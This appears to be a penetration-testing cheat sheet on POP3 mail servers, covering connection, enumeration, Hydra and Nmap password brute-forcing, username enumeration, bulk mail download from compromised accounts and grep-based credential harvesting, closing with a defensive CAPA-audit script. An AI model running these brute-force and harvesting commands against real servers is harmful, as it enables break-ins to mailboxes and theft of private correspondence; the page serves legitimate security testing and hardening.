POP3 (Post Office Protocol)

Default Ports: 110 (POP3), 995 (POP3S)

Post Office Protocol version 3 (POP3) is an email protocol used to retrieve emails from a remote server to a local client. Unlike IMAP, POP3 typically downloads emails to the client and deletes them from the server (though this can be configured). POP3 is simpler than IMAP but less feature-rich, primarily designed for offline email access.

Connect

Using Telnet

# Connect to POP3 server
telnet target.com 110

# Basic POP3 conversation
USER username
PASS password
LIST
RETR 1
QUIT

Using openssl (POP3S)

# Connect with SSL
openssl s_client -connect target.com:995 -crlf -quiet

# POP3 commands
USER username
PASS password
LIST
QUIT

Using curl

# List emails
curl -u username:password pop3://target.com/

# Read specific email
curl -u username:password pop3://target.com/1

# POP3S (--insecure skips certificate verification; use it only for self-signed test servers)
curl -u username:password pop3s://target.com/ --insecure

Recon

Service Detection with Nmap

Use Nmap to detect POP3 mail servers and identify server capabilities.

nmap -p 110,995 target.com

Connect to POP3 servers to gather version and service information.

Using netcat

# Using netcat
nc target.com 110

Using telnet

# Using telnet
telnet target.com 110

Using nmap

# Using nmap
nmap -p 110 -sV target.com

Enumeration

Capability Enumeration

POP3 servers advertise their supported features and extensions through the CAPA command.

# Get server capabilities
telnet target.com 110
CAPA

# Response shows:
# +OK Capability list follows
# USER
# PIPELINING
# TOP
# UIDL
# STLS
# .

Mailbox Enumeration

Explore mailbox contents and message information.

# After login
USER username
PASS password

# List messages
LIST

# Message count and size
STAT

# Get message UIDs
UIDL

Attack Vectors

Brute Force

Brute forcing POP3 credentials can reveal weak email account passwords.

Using Hydra

# POP3 (plaintext)
hydra -l user@target.com -P passwords.txt pop3://target.com

# POP3S (SSL/TLS)
hydra -l user@target.com -P passwords.txt pop3s://target.com:995

# Multiple users
hydra -L users.txt -P passwords.txt pop3://target.com

Using Nmap

nmap -p 110 --script pop3-brute target.com

User Enumeration

POP3 doesn't have VRFY/EXPN like SMTP, but you can enumerate via login attempts.

# Different error messages may reveal valid users
telnet target.com 110
USER admin
# +OK vs -ERR can indicate if user exists

# Timing attacks
# Valid users may take longer to respond

Post-Exploitation

Email Download

Download emails from compromised POP3 accounts for analysis.

Automated Email Download

# Download all emails with curl
for i in {1..100}; do
    curl -u username:password "pop3://target.com/$i" > "email_$i.eml" 2>/dev/null
done

Manual Email Retrieval

# Using telnet
telnet target.com 110
USER username
PASS password
# Get message count
STAT
# Retrieve first email
RETR 1
# Second email
RETR 2

Credential Harvesting

Extract sensitive information from downloaded emails.

# Search downloaded emails for credentials
grep -r "password\|credential\|username" *.eml

# Extract URLs ([^[:space:]] is the POSIX class; \s is not a whitespace escape inside brackets)
grep -Eiorh 'https?://[^[:space:]]+' *.eml

# Extract email addresses
grep -Eiorh '\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}\b' *.eml

Common POP3 Commands

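| Command | Description | Usage |
|---------|-------------|-------|
| USER | Username | USER username |
| PASS | Password | PASS password |
| STAT | Mailbox stats | STAT |
| LIST | List messages | LIST |
| RETR | Retrieve message | RETR 1 |
| DELE | Mark for deletion | DELE 1 |
| NOOP | No operation | NOOP |
| RSET | Reset | RSET |
| TOP | Message header + lines | TOP 1 10 |
| UIDL | Unique IDs | UIDL |
| QUIT | Close connection | QUIT |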

Useful Tools

| Tool | Description | Primary Use Case |
|------|-------------|------------------|
| telnet | Terminal client | Manual testing |
| openssl s_client | SSL/TLS client | POP3S connection |
| curl | Transfer tool | Automated access |
| Hydra | Password cracker | Brute force |
| Nmap | Network scanner | Service detection |
| Metasploit | Exploitation framework | Automated testing |

Security Misconfigurations

  • ❌ No encryption (port 110)
  • ❌ Weak passwords
  • ❌ No rate limiting
  • ❌ Plaintext authentication
  • ❌ No account lockout
  • ❌ Outdated server software
  • ❌ No TLS enforcement
  • ❌ Information disclosure
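
A defender-side check tying the CAPA listing under Capability Enumeration to the misconfigurations above, as an added example that is not part of the original page: it parses a CAPA response and flags cleartext-authentication exposure. The sample response and the names `parse_capa` and `audit_capa` are constructed for illustration, and an advertised USER capability before TLS is treated as a heuristic signal, not proof that the server accepts the login.

```python
# Added example: audit a POP3 CAPA response for cleartext-auth exposure.
# SAMPLE_CAPA is constructed for illustration, mirroring the CAPA listing on this page.
SAMPLE_CAPA = (
    "+OK Capability list follows\r\n"
    "USER\r\n"
    "PIPELINING\r\n"
    "TOP\r\n"
    "UIDL\r\n"
    "STLS\r\n"
    ".\r\n"
)

PLAINTEXT_SASL = {"PLAIN", "LOGIN"}  # SASL mechanisms that transmit the password itself


def parse_capa(raw):
    """Parse a multi-line CAPA response into {TAG: [params]} (RFC 2449 layout)."""
    lines = raw.replace("\r\n", "\n").split("\n")
    if not lines[0].startswith("+OK"):
        raise ValueError("server did not return +OK to CAPA")
    caps = {}
    for line in lines[1:]:
        if line == ".":              # a lone dot terminates the listing
            return caps
        if not line.strip():
            continue
        tag, *params = line.split()
        caps[tag.upper()] = [p.upper() for p in params]
    raise ValueError("CAPA listing not terminated by '.'")


def audit_capa(caps, tls_active):
    """Return findings for a capability set; tls_active says whether TLS is already up."""
    if tls_active:
        return []                    # credentials are already protected in transit
    findings = []
    plaintext_sasl = bool(PLAINTEXT_SASL & set(caps.get("SASL", [])))
    if "STLS" not in caps:
        findings.append("no STLS: session cannot be upgraded to TLS")
    if "USER" in caps or plaintext_sasl:
        findings.append("plaintext login advertised before TLS")
    return findings


if __name__ == "__main__":
    for finding in audit_capa(parse_capa(SAMPLE_CAPA), tls_active=False):
        print("[!]", finding)
```

Run it against the CAPA output captured on port 110 before STLS; an empty result means the server advertises STLS and offers no plaintext login in the clear.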